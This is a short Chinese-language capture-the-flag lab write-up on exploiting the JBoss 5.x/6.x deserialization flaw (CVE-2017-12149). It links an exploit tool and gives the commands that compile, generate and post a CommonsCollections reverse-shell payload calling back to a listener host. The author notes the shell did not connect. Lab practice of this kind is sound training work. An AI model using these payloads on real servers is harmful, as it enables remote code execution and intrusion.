墨者

it2023-05-29  68

靶场:

https://www.mozhe.cn/bug/detail/bVk4Z1hPRktPZStBVWV6QUw2YmY0dz09bW96aGUmozhe

背景介绍

JBoss 5.x / 6.x反序列化漏洞分析溯源

实训目标

1、了解JBoss 5.x / 6.x反序列化漏洞形成原理;   2、掌握JBoss 5.x / 6.x反序列化漏洞利用方法;

解题方向

利用JBoss 5.x / 6.x反序列化漏洞执行任意代码。 key在根目录;

解题思路:

访问JBoss漏洞页面,响应码500,证明漏洞存在

http://219.153.49.228:43015/invoker/readonly

法一:

利用反序列化工具https://github.com/yunxu1/jboss-_CVE-2017-12149

cat /key.txt    得到key

法二:使用Kali反弹shell

下载漏洞利用脚本到本地http://scan.javasec.cn/java/JavaDeserH2HC.zip

编译预置 Payload 的 Java 文件

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

运行以下命令,生成的反序列化对象:

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.220.128:9999

Kali监听9999:

使用 curl 命令向http://219.153.49.228:43015/invoker/readonly提交生成的反序列化对象:

curl -v http://219.153.49.228:43015/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

不知道为什么没反弹成功

最新回复(0)